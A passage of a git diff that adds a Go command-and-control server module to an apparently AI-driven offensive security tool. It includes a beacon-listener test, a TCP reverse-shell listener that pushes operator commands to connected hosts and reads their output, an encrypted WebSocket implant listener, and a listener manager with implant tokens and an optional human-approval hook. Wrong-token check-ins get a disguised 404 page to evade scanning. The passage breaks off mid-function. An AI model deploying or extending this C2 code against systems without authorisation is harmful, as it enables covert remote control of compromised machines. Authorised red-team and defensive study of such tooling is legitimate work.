db.CreateC2Listener(rec); err != nil { + t.Fatal(err) + } + + m := NewManager(db, zap.NewNop(), filepath.Join(tmp, "c2store")) + m.Registry().Register(string(ListenerTypeHTTPBeacon), NewHTTPBeaconListener) + if _, err := m.StartListener(lid); err != nil { + t.Fatal(err) + } + t.Cleanup(func() { _ = m.StopListener(lid) }) + + base := "http://127.0.0.1:" + strconv.Itoa(port) + client := &http.Client{Timeout: 5 * time.Second} + + t.Run("wrong_path_go_default_404", func(t *testing.T) { + resp, err := client.Post(base+"/nope", "application/json", strings.NewReader(`{}`)) + if err != nil { + t.Fatal(err) + } + defer resp.Body.Close() + b, _ := io.ReadAll(resp.Body) + if resp.StatusCode != http.StatusNotFound { + t.Fatalf("status=%d body=%q", resp.StatusCode, b) + } + if !strings.Contains(string(b), "404") || !strings.Contains(strings.ToLower(string(b)), "not found") { + t.Fatalf("unexpected body: %q", b) + } + }) + + t.Run("check_in_wrong_token_disguised_html_404", func(t *testing.T) { + req, _ := http.NewRequest(http.MethodPost, base+"/check_in", bytes.NewBufferString(`{"hostname":"h"}`)) + req.Header.Set("X-Implant-Token", "wrong-token") + req.Header.Set("Content-Type", "application/json") + resp, err := client.Do(req) + if err != nil { + t.Fatal(err) + } + defer resp.Body.Close() + b, _ := io.ReadAll(resp.Body) + if resp.StatusCode != http.StatusNotFound { + t.Fatalf("status=%d", resp.StatusCode) + } + ct := resp.Header.Get("Content-Type") + if !strings.Contains(ct, "text/html") { + t.Fatalf("content-type=%q body=%q", ct, b) + } + if !strings.Contains(string(b), "404 Not Found") { + t.Fatalf("expected disguised HTML, got: %q", b) + } + }) + + t.Run("check_in_ok_plaintext_json", func(t *testing.T) { + body := `{"hostname":"n","username":"u","os":"Linux","arch":"amd64","internal_ip":"10.0.0.1","pid":42}` + req, _ := http.NewRequest(http.MethodPost, base+"/check_in", strings.NewReader(body)) + req.Header.Set("X-Implant-Token", token) + req.Header.Set("Content-Type", "application/json") + resp, err := client.Do(req) + if err != nil { + t.Fatal(err) + } + defer resp.Body.Close() + b, _ := io.ReadAll(resp.Body) + if resp.StatusCode != http.StatusOK { + t.Fatalf("status=%d body=%s", resp.StatusCode, b) + } + var out ImplantCheckInResponse + if err := json.Unmarshal(b, &out); err != nil { + t.Fatalf("json: %v body=%s", err, b) + } + if out.SessionID == "" || out.NextSleep <= 0 { + t.Fatalf("bad response: %+v", out) + } + }) +} diff --git a/c2/listener_tcp.go b/c2/listener_tcp.go new file mode 100644 index 00000000..14ff9f35 --- /dev/null +++ b/c2/listener_tcp.go @@ -0,0 +1,439 @@ +package c2 + +import ( + "bufio" + "context" + "crypto/sha256" + "encoding/hex" + "fmt" + "io" + "net" + "regexp" + "strings" + "sync" + "sync/atomic" + "time" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// TCPReverseListener 监听 TCP 端口,等待目标机反弹连接。 +// 经典模式:纯交互式 raw shell,与 nc / bash -i >& /dev/tcp 兼容。 +// 二进制 Beacon:连接后先发送魔数 CSB1,随后使用与 HTTP Beacon 相同的 AES-GCM JSON 语义(成帧见 tcp_beacon_server.go)。 +// 每个新连接自动生成一个 implant_uuid(基于远端地址 + 启动时间 hash),登记为 c2_session; +// 任务派发:使用同步 exec 模式 —— 收到 task 时直接 send 命令字节并读取输出(带结束标记)。 +type TCPReverseListener struct { + rec *database.C2Listener + cfg *ListenerConfig + manager *Manager + logger *zap.Logger + + mu sync.Mutex + listener net.Listener + stopCh chan struct{} + conns map[string]*tcpReverseConn // session_id → 连接 + stopOnce sync.Once +} + +// tcpReverseConn 单个反弹会话的运行时状态 +type tcpReverseConn struct { + sessionID string + conn net.Conn + reader *bufio.Reader + writeMu sync.Mutex // 序列化 write,避免并发 task 写入 + taskMode int32 // 原子标志: 0=空闲(handleConn读), 1=任务中(runTaskOnConn独占读) +} + +// NewTCPReverseListener 工厂方法(注册到 ListenerRegistry["tcp_reverse"]) +func NewTCPReverseListener(ctx ListenerCreationCtx) (Listener, error) { + return &TCPReverseListener{ + rec: ctx.Listener, + cfg: ctx.Config, + manager: ctx.Manager, + logger: ctx.Logger, + stopCh: make(chan struct{}), + conns: make(map[string]*tcpReverseConn), + }, nil +} + +// Type 返回类型常量 +func (l *TCPReverseListener) Type() string { return string(ListenerTypeTCPReverse) } + +// Start 启动 TCP 监听,accept 在独立 goroutine 中运行 +func (l *TCPReverseListener) Start() error { + addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort) + ln, err := net.Listen("tcp", addr) + if err != nil { + if isAddrInUse(err) { + return ErrPortInUse + } + return err + } + l.mu.Lock() + l.listener = ln + l.mu.Unlock() + go l.acceptLoop() + go l.taskDispatcherLoop() + return nil +} + +// Stop 关闭监听 + 所有活动连接 +func (l *TCPReverseListener) Stop() error { + l.stopOnce.Do(func() { + close(l.stopCh) + }) + l.mu.Lock() + if l.listener != nil { + _ = l.listener.Close() + l.listener = nil + } + for sid, c := range l.conns { + _ = c.conn.Close() + delete(l.conns, sid) + } + l.mu.Unlock() + return nil +} + +func (l *TCPReverseListener) acceptLoop() { + for { + l.mu.Lock() + ln := l.listener + l.mu.Unlock() + if ln == nil { + return + } + conn, err := ln.Accept() + if err != nil { + select { + case <-l.stopCh: + return + default: + } + if isClosedConnErr(err) { + return + } + l.logger.Warn("tcp_reverse accept 失败", zap.Error(err)) + continue + } + go l.handleConn(conn) + } +} + +// handleConn 一个连接=一个会话:先识别二进制 TCP Beacon(魔数 CSB1),否则走经典交互式 shell。 +func (l *TCPReverseListener) handleConn(conn net.Conn) { + br := bufio.NewReader(conn) + _ = conn.SetReadDeadline(time.Now().Add(20 * time.Second)) + prefix, err := br.Peek(4) + if err == nil && len(prefix) == 4 && string(prefix) == tcpBeaconMagic { + if _, err := br.Discard(4); err != nil { + _ = conn.Close() + return + } + _ = conn.SetReadDeadline(time.Time{}) + l.handleTCPBeaconSession(conn, br) + return + } + _ = conn.SetReadDeadline(time.Time{}) + l.handleShellConn(conn, br) +} + +// handleShellConn 经典裸 TCP 反弹 shell(与 nc/bash /dev/tcp 兼容)。 +func (l *TCPReverseListener) handleShellConn(conn net.Conn, br *bufio.Reader) { + remote := conn.RemoteAddr().String() + host, _, _ := net.SplitHostPort(remote) + // 用 listener+remote_ip 生成稳定 implant_uuid,使同一来源的重连复用同一会话 + uuidSeed := fmt.Sprintf("%s|%s", l.rec.ID, host) + hash := sha256.Sum256([]byte(uuidSeed)) + implantUUID := hex.EncodeToString(hash[:8]) + + checkin := ImplantCheckInRequest{ + ImplantUUID: implantUUID, + Hostname: "tcp_" + host, + Username: "unknown", + OS: "unknown", + Arch: "unknown", + InternalIP: host, + SleepSeconds: 0, // 交互式不需要 sleep + JitterPercent: 0, + Metadata: map[string]interface{}{ + "transport": "tcp_reverse", + "remote": remote, + }, + } + session, err := l.manager.IngestCheckIn(l.rec.ID, checkin) + if err != nil { + l.logger.Warn("tcp_reverse 登记会话失败", zap.Error(err)) + _ = conn.Close() + return + } + + tc := &tcpReverseConn{ + sessionID: session.ID, + conn: conn, + reader: br, + } + l.mu.Lock() + if old, exists := l.conns[session.ID]; exists { + _ = old.conn.Close() + } + l.conns[session.ID] = tc + l.mu.Unlock() + + defer func() { + l.mu.Lock() + if cur, ok := l.conns[session.ID]; ok && cur == tc { + delete(l.conns, session.ID) + _ = l.manager.MarkSessionDead(session.ID) + } + l.mu.Unlock() + _ = conn.Close() + }() + + // 主循环:检测连接存活 + 读取非任务期间的 unsolicited 输出 + // 注意:必须统一使用 tc.reader 读取,避免与 runTaskOnConn 的 bufio.Reader 产生数据分裂 + buf := make([]byte, 4096) + for { + select { + case <-l.stopCh: + return + default: + } + // 任务执行中,runTaskOnConn 独占读取权,主循环暂停 + if atomic.LoadInt32(&tc.taskMode) == 1 { + time.Sleep(100 * time.Millisecond) + continue + } + _ = conn.SetReadDeadline(time.Now().Add(60 * time.Second)) + n, err := tc.reader.Read(buf) + if n > 0 { + // 收到数据也刷新心跳 + _ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now()) + if atomic.LoadInt32(&tc.taskMode) == 0 { + l.manager.publishEvent("info", "task", session.ID, "", + "stdout(unsolicited)", map[string]interface{}{ + "output": string(buf[:n]), + }) + } + } + if err != nil { + if err == io.EOF || isClosedConnErr(err) { + return + } + if ne, ok := err.(net.Error); ok && ne.Timeout() { + // 读超时 = 连接仍存活但无数据,刷新心跳防止看门狗误判 + _ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now()) + continue + } + return + } + } +} + +// taskDispatcherLoop 周期扫描所有活动会话的任务队列,下发 exec/shell 类型的同步命令 +func (l *TCPReverseListener) taskDispatcherLoop() { + t := time.NewTicker(500 * time.Millisecond) + defer t.Stop() + for { + select { + case <-l.stopCh: + return + case <-t.C: + l.mu.Lock() + snapshot := make([]*tcpReverseConn, 0, len(l.conns)) + for _, c := range l.conns { + snapshot = append(snapshot, c) + } + l.mu.Unlock() + for _, c := range snapshot { + envelopes, err := l.manager.PopTasksForBeacon(c.sessionID, 5) + if err != nil || len(envelopes) == 0 { + continue + } + for _, env := range envelopes { + go l.runTaskOnConn(c, env) + } + } + } + } +} + +// runTaskOnConn 把一条 task 转成 raw shell 命令发送,通过结束标记读输出 +func (l *TCPReverseListener) runTaskOnConn(c *tcpReverseConn, env TaskEnvelope) { + startedAt := NowUnixMillis() + cmd, ok := buildTCPCommand(TaskType(env.TaskType), env.Payload) + if !ok { + l.reportTaskResult(env.TaskID, startedAt, false, "", "tcp_reverse listener 不支持该任务类型: "+env.TaskType, "", "") + return + } + + // 独占读取权:通知 handleConn 主循环暂停 + atomic.StoreInt32(&c.taskMode, 1) + defer atomic.StoreInt32(&c.taskMode, 0) + + // 等待 handleConn 循环退出读取(给 100ms 让正在进行的 Read 超时/完成) + time.Sleep(150 * time.Millisecond) + + // 排空 buffer 中残留的 bash 提示符等数据 + drainStaleData(c.reader, c.conn) + + endMark := fmt.Sprintf("__C2_DONE_%s__", env.TaskID) + wrapped := fmt.Sprintf("%s\necho %s\n", strings.TrimSpace(cmd), endMark) + c.writeMu.Lock() + _ = c.conn.SetWriteDeadline(time.Now().Add(15 * time.Second)) + if _, err := c.conn.Write([]byte(wrapped)); err != nil { + c.writeMu.Unlock() + l.reportTaskResult(env.TaskID, startedAt, false, "", "写命令失败: "+err.Error(), "", "") + return + } + c.writeMu.Unlock() + + ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second) + defer cancel() + output, err := readUntilMarker(ctx, c.reader, endMark) + if err != nil { + l.reportTaskResult(env.TaskID, startedAt, false, output, "读取结果失败: "+err.Error(), "", "") + return + } + cleaned := cleanShellOutput(output, cmd) + l.reportTaskResult(env.TaskID, startedAt, true, cleaned, "", "", "") +} + +// reportTaskResult 适配 Manager.IngestTaskResult,统一报告路径 +func (l *TCPReverseListener) reportTaskResult(taskID string, startedAtMS int64, success bool, output, errMsg, blobB64, blobSuffix string) { + _ = l.manager.IngestTaskResult(TaskResultReport{ + TaskID: taskID, + Success: success, + Output: output, + Error: errMsg, + BlobBase64: blobB64, + BlobSuffix: blobSuffix, + StartedAt: startedAtMS, + EndedAt: NowUnixMillis(), + }) +} + +// buildTCPCommand 把 (TaskType + payload) 转成 raw shell 命令字符串。 +// 仅支持 TCP 反弹模式可直接执行的最简任务类型;upload/download/screenshot 这些 +// 需要二进制传输的能力建议使用 http_beacon。 +func buildTCPCommand(t TaskType, payload map[string]interface{}) (string, bool) { + switch t { + case TaskTypeExec, TaskTypeShell: + cmd, _ := payload["command"].(string) + return cmd, true + case TaskTypePwd: + return "pwd 2>/dev/null || cd", true + case TaskTypeLs: + path, _ := payload["path"].(string) + if strings.TrimSpace(path) == "" { + path = "." + } + return "ls -la " + shellQuote(path), true + case TaskTypePs: + return "ps -ef 2>/dev/null || ps aux", true + case TaskTypeKillProc: + pid, _ := payload["pid"].(float64) + if pid <= 0 { + return "", false + } + return fmt.Sprintf("kill -9 %d", int(pid)), true + case TaskTypeCd: + path, _ := payload["path"].(string) + if strings.TrimSpace(path) == "" { + return "", false + } + return "cd " + shellQuote(path) + " && pwd", true + case TaskTypeExit: + return "exit 0", true + } + return "", false +} + +// readUntilMarker 从 reader 持续读,直到匹配 endMarker;返回去掉标记后的输出 +func readUntilMarker(ctx context.Context, r *bufio.Reader, marker string) (string, error) { + var sb strings.Builder + buf := make([]byte, 4096) + deadline := time.Now().Add(60 * time.Second) + for { + select { + case <-ctx.Done(): + return sb.String(), ctx.Err() + default: + } + if time.Now().After(deadline) { + return sb.String(), fmt.Errorf("timeout") + } + n, err := r.Read(buf) + if n > 0 { + sb.Write(buf[:n]) + if idx := strings.Index(sb.String(), marker); idx >= 0 { + return strings.TrimRight(sb.String()[:idx], "\r\n"), nil + } + } + if err != nil { + return sb.String(), err + } + } +} + +func shellQuote(s string) string { + return "'" + strings.ReplaceAll(s, "'", "'\\''") + "'" +} + +func isAddrInUse(err error) bool { + if err == nil { + return false + } + return strings.Contains(strings.ToLower(err.Error()), "address already in use") || + strings.Contains(strings.ToLower(err.Error()), "bind: only one usage") +} + +func isClosedConnErr(err error) bool { + if err == nil { + return false + } + es := err.Error() + return strings.Contains(es, "use of closed network connection") || + strings.Contains(es, "connection reset by peer") +} + +// drainStaleData 用短超时读取并丢弃 buffer 中残留的 shell 提示符等数据 +func drainStaleData(r *bufio.Reader, conn net.Conn) { + buf := make([]byte, 4096) + for { + _ = conn.SetReadDeadline(time.Now().Add(200 * time.Millisecond)) + n, err := r.Read(buf) + if n == 0 || err != nil { + break + } + } + // 恢复较长的读超时 + _ = conn.SetReadDeadline(time.Time{}) +} + +var shellPromptRe = regexp.MustCompile(`(?m)^.*?(bash[\-\d.]*\$|[\$#%>]\s*)$`) + +// cleanShellOutput 过滤 bash 提示符行和命令回显,返回干净的命令输出 +func cleanShellOutput(raw, cmd string) string { + lines := strings.Split(raw, "\n") + var cleaned []string + cmdTrimmed := strings.TrimSpace(cmd) + echoSkipped := false + for _, line := range lines { + trimmed := strings.TrimRight(line, "\r \t") + // 跳过命令回显行(bash 会 echo 回输入的命令) + if !echoSkipped && cmdTrimmed != "" && strings.Contains(trimmed, cmdTrimmed) { + echoSkipped = true + continue + } + // 跳过纯 shell 提示符行 + if shellPromptRe.MatchString(trimmed) && len(strings.TrimSpace(shellPromptRe.ReplaceAllString(trimmed, ""))) == 0 { + continue + } + cleaned = append(cleaned, line) + } + result := strings.Join(cleaned, "\n") + return strings.TrimSpace(result) +} diff --git a/c2/listener_websocket.go b/c2/listener_websocket.go new file mode 100644 index 00000000..da7f85db --- /dev/null +++ b/c2/listener_websocket.go @@ -0,0 +1,297 @@ +package c2 + +import ( + "context" + "crypto/subtle" + "encoding/json" + "errors" + "fmt" + "net" + "net/http" + "sync" + "time" + + "cyberstrike-ai/internal/database" + + "github.com/gorilla/websocket" + "go.uber.org/zap" +) + +// WebSocketListener 提供低延迟的双向 WebSocket Beacon。 +// 与 HTTP Beacon 相比: +// - beacon 与服务端保持长连接,无需轮询,新任务可"秒到"; +// - 适合需要交互式快速响应的场景(如实时键盘 / 流式输出); +// - 协议依然走 AES-256-GCM,握手时校验 X-Implant-Token; +// - 一个 listener 仅处理一个 WS 路径(默认 /ws),但可承载多个并发 implant。 +// +// 帧协议(皆为加密后 base64 字符串走 TextMessage): +// client → server:{"type":"checkin"|"result", "data": } +// server → client:{"type":"task", "data": } 或 {"type":"sleep","data":{"sleep":N,"jitter":J}} +type WebSocketListener struct { + rec *database.C2Listener + cfg *ListenerConfig + manager *Manager + logger *zap.Logger + + srv *http.Server + upgrader websocket.Upgrader + + mu sync.Mutex + conns map[string]*wsConn // session_id → 连接 + stopped bool + stopCh chan struct{} +} + +// wsConn 单个 WS implant 的内存状态 +type wsConn struct { + sessionID string + ws *websocket.Conn + writeMu sync.Mutex // websocket 同一连接同一时间只能一个 writer +} + +// NewWebSocketListener 工厂(注册到 ListenerRegistry["websocket"]) +func NewWebSocketListener(ctx ListenerCreationCtx) (Listener, error) { + return &WebSocketListener{ + rec: ctx.Listener, + cfg: ctx.Config, + manager: ctx.Manager, + logger: ctx.Logger, + stopCh: make(chan struct{}), + conns: make(map[string]*wsConn), + upgrader: websocket.Upgrader{ + ReadBufferSize: 4096, + WriteBufferSize: 4096, + // 允许任意 Origin(implant 不带 Origin 或随便填) + CheckOrigin: func(r *http.Request) bool { return true }, + }, + }, nil +} + +// Type 类型 +func (l *WebSocketListener) Type() string { return string(ListenerTypeWebSocket) } + +// Start 启动 HTTP server 接收 WS 升级 +func (l *WebSocketListener) Start() error { + mux := http.NewServeMux() + wsPath := l.cfg.BeaconCheckInPath + if wsPath == "" || wsPath == "/check_in" { + // websocket 默认路径单独定义,避免与 HTTP Beacon 默认路径混淆 + wsPath = "/ws" + } + mux.HandleFunc(wsPath, l.handleWS) + + addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort) + ln, err := net.Listen("tcp", addr) + if err != nil { + if isAddrInUse(err) { + return ErrPortInUse + } + return err + } + l.srv = &http.Server{ + Addr: addr, + Handler: mux, + ReadHeaderTimeout: 15 * time.Second, + } + go func() { + if err := l.srv.Serve(ln); err != nil && !errors.Is(err, http.ErrServerClosed) { + l.logger.Warn("websocket Serve exited", zap.Error(err)) + } + }() + go l.taskDispatcherLoop() + return nil +} + +// Stop 优雅关闭:通知所有 WS 客户端,关闭 server +func (l *WebSocketListener) Stop() error { + l.mu.Lock() + if l.stopped { + l.mu.Unlock() + return nil + } + l.stopped = true + close(l.stopCh) + conns := make([]*wsConn, 0, len(l.conns)) + for _, c := range l.conns { + conns = append(conns, c) + } + l.conns = make(map[string]*wsConn) + l.mu.Unlock() + for _, c := range conns { + _ = c.ws.WriteControl(websocket.CloseMessage, + websocket.FormatCloseMessage(websocket.CloseGoingAway, "shutdown"), + time.Now().Add(time.Second)) + _ = c.ws.Close() + } + if l.srv != nil { + ctx, cancel := contextWithTimeout(5 * time.Second) + defer cancel() + _ = l.srv.Shutdown(ctx) + } + return nil +} + +func (l *WebSocketListener) handleWS(w http.ResponseWriter, r *http.Request) { + got := r.Header.Get("X-Implant-Token") + if got == "" || l.rec.ImplantToken == "" || + subtle.ConstantTimeCompare([]byte(got), []byte(l.rec.ImplantToken)) != 1 { + http.NotFound(w, r) + return + } + ws, err := l.upgrader.Upgrade(w, r, nil) + if err != nil { + l.logger.Warn("websocket 升级失败", zap.Error(err)) + return + } + go l.handleConn(ws) +} + +// handleConn 处理一个 WS 连接的完整生命周期:等待 checkin → 登记 session → 读循环 +func (l *WebSocketListener) handleConn(ws *websocket.Conn) { + ws.SetReadLimit(64 << 20) + ws.SetReadDeadline(time.Now().Add(60 * time.Second)) + ws.SetPongHandler(func(string) error { + ws.SetReadDeadline(time.Now().Add(60 * time.Second)) + return nil + }) + + // 第一帧必须是 checkin + frameType, body, err := readEncryptedFrame(ws, l.rec.EncryptionKey) + if err != nil || frameType != "checkin" { + _ = ws.Close() + return + } + var req ImplantCheckInRequest + if err := json.Unmarshal(body, &req); err != nil { + _ = ws.Close() + return + } + if req.SleepSeconds <= 0 { + req.SleepSeconds = l.cfg.DefaultSleep + } + session, err := l.manager.IngestCheckIn(l.rec.ID, req) + if err != nil { + _ = ws.Close() + return + } + conn := &wsConn{sessionID: session.ID, ws: ws} + l.mu.Lock() + l.conns[session.ID] = conn + l.mu.Unlock() + defer func() { + l.mu.Lock() + delete(l.conns, session.ID) + l.mu.Unlock() + _ = ws.Close() + _ = l.manager.MarkSessionDead(session.ID) + }() + + // 心跳 goroutine + pingTicker := time.NewTicker(20 * time.Second) + defer pingTicker.Stop() + go func() { + for { + select { + case <-l.stopCh: + return + case <-pingTicker.C: + conn.writeMu.Lock() + _ = ws.WriteControl(websocket.PingMessage, nil, time.Now().Add(5*time.Second)) + conn.writeMu.Unlock() + } + } + }() + + // 主读循环:处理 result 等帧 + for { + frameType, body, err := readEncryptedFrame(ws, l.rec.EncryptionKey) + if err != nil { + return + } + switch frameType { + case "result": + var report TaskResultReport + if err := json.Unmarshal(body, &report); err == nil { + _ = l.manager.IngestTaskResult(report) + } + case "checkin": + // 心跳更新:beacon 周期性送上心跳 + var hb ImplantCheckInRequest + if err := json.Unmarshal(body, &hb); err == nil { + _ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now()) + } + } + } +} + +// taskDispatcherLoop 周期扫描所有活动 WS 会话,下发任务 +func (l *WebSocketListener) taskDispatcherLoop() { + t := time.NewTicker(500 * time.Millisecond) + defer t.Stop() + for { + select { + case <-l.stopCh: + return + case <-t.C: + l.mu.Lock() + snapshot := make([]*wsConn, 0, len(l.conns)) + for _, c := range l.conns { + snapshot = append(snapshot, c) + } + l.mu.Unlock() + for _, c := range snapshot { + envelopes, err := l.manager.PopTasksForBeacon(c.sessionID, 20) + if err != nil || len(envelopes) == 0 { + continue + } + for _, env := range envelopes { + l.sendTaskFrame(c, env) + } + } + } + } +} + +func (l *WebSocketListener) sendTaskFrame(c *wsConn, env TaskEnvelope) { + frame := map[string]interface{}{"type": "task", "data": env} + body, err := json.Marshal(frame) + if err != nil { + return + } + enc, err := EncryptAESGCM(l.rec.EncryptionKey, body) + if err != nil { + return + } + c.writeMu.Lock() + defer c.writeMu.Unlock() + _ = c.ws.SetWriteDeadline(time.Now().Add(10 * time.Second)) + _ = c.ws.WriteMessage(websocket.TextMessage, []byte(enc)) +} + +// readEncryptedFrame 读一帧加密 WS 文本,返回类型和明文 data +func readEncryptedFrame(ws *websocket.Conn, key string) (string, []byte, error) { + mt, raw, err := ws.ReadMessage() + if err != nil { + return "", nil, err + } + if mt != websocket.TextMessage && mt != websocket.BinaryMessage { + return "", nil, errors.New("unexpected ws frame type") + } + plain, err := DecryptAESGCM(key, string(raw)) + if err != nil { + return "", nil, err + } + var env struct { + Type string `json:"type"` + Data json.RawMessage `json:"data"` + } + if err := json.Unmarshal(plain, &env); err != nil { + return "", nil, err + } + return env.Type, env.Data, nil +} + +// contextWithTimeout 简单封装,避免 listener 文件之间反复 import context +func contextWithTimeout(d time.Duration) (context.Context, context.CancelFunc) { + return context.WithTimeout(context.Background(), d) +} diff --git a/c2/manager.go b/c2/manager.go new file mode 100644 index 00000000..c6309e77 --- /dev/null +++ b/c2/manager.go @@ -0,0 +1,779 @@ +package c2 + +import ( + "context" + "encoding/json" + "errors" + "fmt" + "path/filepath" + "regexp" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/database" + + "github.com/google/uuid" + "go.uber.org/zap" +) + +// Manager 是 C2 模块对外的统一门面: +// - HTTP handler / MCP 工具 / 多代理 / 攻击链记录器 全部通过 Manager 操作 C2, +// 不直接接触 listener 实现细节,避免循环依赖; +// - 持有数据库句柄 + 事件总线 + 内存中的 listener 实例 map; +// - 启动期可调用 RestoreRunningListeners() 把 status=running 的 listener 重新拉起。 +// +// 实例化由 internal/app 负责,注入到全局 App 之后再分别交给 handler / mcp. +type Manager struct { + db *database.DB + logger *zap.Logger + bus *EventBus + registry *ListenerRegistry + + mu sync.RWMutex + runningListeners map[string]Listener // listener_id → 已 Start 的 listener 实例 + storageDir string // 大结果(截图/下载)落盘根目录 + + hitlBridge HITLBridge // 危险任务在 EnqueueTask 时调它发起审批(nil 表示不接 HITL) + hitlDangerousGate func(conversationID, mcpToolName string) bool // 与人机协同一致:为 nil 或返回 false 时不走桥 + hooks Hooks // 扩展挂钩:会话上线 / 任务完成 时通知漏洞库与攻击链 +} + +// MCPToolC2Task 与 MCP builtin、c2_task 工具名一致,供 HITL 白名单与 Agent 侧对齐。 +const MCPToolC2Task = "c2_task" + +// HITLBridge 把"危险任务"桥到现有 internal/handler/hitl 审批流的接口。 +// internal/app 实例化时传入;空实现表示禁用 HITL 拦截(开发期方便)。 +type HITLBridge interface { + // RequestApproval 阻塞等待人工审批;返回 nil 表示批准,error 表示拒绝/超时。 + // ctx 携带用户/会话信息;危险任务调用时会创建超时 ctx 避免无限挂起。 + RequestApproval(ctx context.Context, req HITLApprovalRequest) error +} + +// HITLApprovalRequest 待审批的 C2 操作描述 +type HITLApprovalRequest struct { + TaskID string + SessionID string + TaskType string + PayloadJSON string + ConversationID string + Source string + Reason string +} + +// Hooks 给上层(漏洞管理 / 攻击链)注入回调 +type Hooks struct { + OnSessionFirstSeen func(session *database.C2Session) // 新会话首次上线 + OnTaskCompleted func(task *database.C2Task, sessionID string) // 任务完成(success/failed) +} + +// NewManager 创建 Manager;不会启动任何 listener,请显式调 RestoreRunningListeners +func NewManager(db *database.DB, logger *zap.Logger, storageDir string) *Manager { + if logger == nil { + logger = zap.NewNop() + } + if storageDir == "" { + storageDir = "tmp/c2" + } + return &Manager{ + db: db, + logger: logger, + bus: NewEventBus(), + registry: NewListenerRegistry(), + runningListeners: make(map[string]Listener), + storageDir: storageDir, + } +} + +// SetHITLBridge 设置危险任务审批桥;nil 表示禁用 +func (m *Manager) SetHITLBridge(b HITLBridge) { + m.mu.Lock() + m.hitlBridge = b + m.mu.Unlock() +} + +// SetHITLDangerousGate 设置 C2 危险任务是否应走 HITL 桥;须与 Agent 人机协同判定一致(例如 handler.HITLManager.NeedsToolApproval)。 +// gate 为 nil 时,即使已设置桥也不会对危险任务发起审批(与未开启人机协同时其他工具行为一致)。 +func (m *Manager) SetHITLDangerousGate(gate func(conversationID, mcpToolName string) bool) { + m.mu.Lock() + m.hitlDangerousGate = gate + m.mu.Unlock() +} + +// SetHooks 注入业务钩子 +func (m *Manager) SetHooks(h Hooks) { + m.mu.Lock() + m.hooks = h + m.mu.Unlock() +} + +// EventBus 暴露事件总线给 SSE handler +func (m *Manager) EventBus() *EventBus { return m.bus } + +// DB 暴露 DB 句柄给 handler/mcptools 直接读写(避免到处包装) +func (m *Manager) DB() *database.DB { return m.db } + +// Logger 暴露日志句柄 +func (m *Manager) Logger() *zap.Logger { return m.logger } + +// StorageDir 大结果落盘根目录 +func (m *Manager) StorageDir() string { return m.storageDir } + +// Registry 暴露 listener 注册表,便于在 internal/app 启动时按 type 注册具体实现 +func (m *Manager) Registry() *ListenerRegistry { return m.registry } + +// Close 优雅关闭:停掉所有运行中的 listener,关闭事件总线 +func (m *Manager) Close() { + m.mu.Lock() + listeners := make([]Listener, 0, len(m.runningListeners)) + for _, l := range m.runningListeners { + listeners = append(listeners, l) + } + m.runningListeners = make(map[string]Listener) + m.mu.Unlock() + for _, l := range listeners { + _ = l.Stop() + } + m.bus.Close() +} + +// ---------------------------------------------------------------------------- +// Listener 生命周期 +// ---------------------------------------------------------------------------- + +// CreateListenerInput Web/MCP 创建监听器的入参(已校验 + 已 trim) +type CreateListenerInput struct { + Name string + Type string + BindHost string + BindPort int + ProfileID string + Remark string + Config *ListenerConfig + // CallbackHost 非空时写入 config_json.callback_host,供 Payload 默认回连(不修改 bind) + CallbackHost string +} + +// CreateListener 校验并落库;不自动启动(与 systemd unit 一致:先创建后启动) +func (m *Manager) CreateListener(in CreateListenerInput) (*database.C2Listener, error) { + if strings.TrimSpace(in.Name) == "" { + return nil, ErrInvalidInput + } + if !IsValidListenerType(in.Type) { + return nil, ErrUnsupportedType + } + if err := SafeBindPort(in.BindPort); err != nil { + return nil, &CommonError{Code: "invalid_port", Message: err.Error(), HTTP: 400} + } + bindHost := strings.TrimSpace(in.BindHost) + if bindHost == "" { + bindHost = "127.0.0.1" // 默认绑定环回,需要外网时操作员显式改 + } + cfg := in.Config + if cfg == nil { + cfg = &ListenerConfig{} + } else { + cp := *cfg + cfg = &cp + } + if ch := strings.TrimSpace(in.CallbackHost); ch != "" { + cfg.CallbackHost = ch + } + cfg.ApplyDefaults() + cfgJSON, err := json.Marshal(cfg) + if err != nil { + return nil, fmt.Errorf("marshal listener config: %w", err) + } + keyB64, err := GenerateAESKey() + if err != nil { + return nil, fmt.Errorf("generate key: %w", err) + } + tokenB64, err := GenerateImplantToken() + if err != nil { + return nil, fmt.Errorf("generate token: %w", err) + } + + listener := &database.C2Listener{ + ID: "l_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14], + Name: strings.TrimSpace(in.Name), + Type: strings.ToLower(strings.TrimSpace(in.Type)), + BindHost: bindHost, + BindPort: in.BindPort, + ProfileID: strings.TrimSpace(in.ProfileID), + EncryptionKey: keyB64, + ImplantToken: tokenB64, + Status: "stopped", + ConfigJSON: string(cfgJSON), + Remark: strings.TrimSpace(in.Remark), + CreatedAt: time.Now(), + } + if err := m.db.CreateC2Listener(listener); err != nil { + return nil, err + } + m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已创建", listener.Name), map[string]interface{}{ + "listener_id": listener.ID, + "type": listener.Type, + }) + return listener, nil +} + +// StartListener 启动指定 listener;幂等(已运行时返回 ErrListenerRunning) +func (m *Manager) StartListener(id string) (*database.C2Listener, error) { + rec, err := m.db.GetC2Listener(id) + if err != nil { + return nil, err + } + if rec == nil { + return nil, ErrListenerNotFound + } + m.mu.Lock() + if _, ok := m.runningListeners[id]; ok { + m.mu.Unlock() + return rec, ErrListenerRunning + } + m.mu.Unlock() + + cfg := &ListenerConfig{} + if rec.ConfigJSON != "" { + _ = json.Unmarshal([]byte(rec.ConfigJSON), cfg) + } + cfg.ApplyDefaults() + + // 通过工厂创建具体实现。必须使用 rec 的副本:HTTP handler 在返回 JSON 前会清空 + // rec.ImplantToken / EncryptionKey 做脱敏,若 listener 实现持有同一指针会导致 beacon 鉴权永久失败。 + listenerRec := *rec + factory := m.registry.Get(rec.Type) + if factory == nil { + return nil, ErrUnsupportedType + } + inst, err := factory(ListenerCreationCtx{ + Listener: &listenerRec, + Config: cfg, + Manager: m, + Logger: m.logger.With(zap.String("listener_id", rec.ID), zap.String("type", rec.Type)), + }) + if err != nil { + return nil, err + } + if err := inst.Start(); err != nil { + 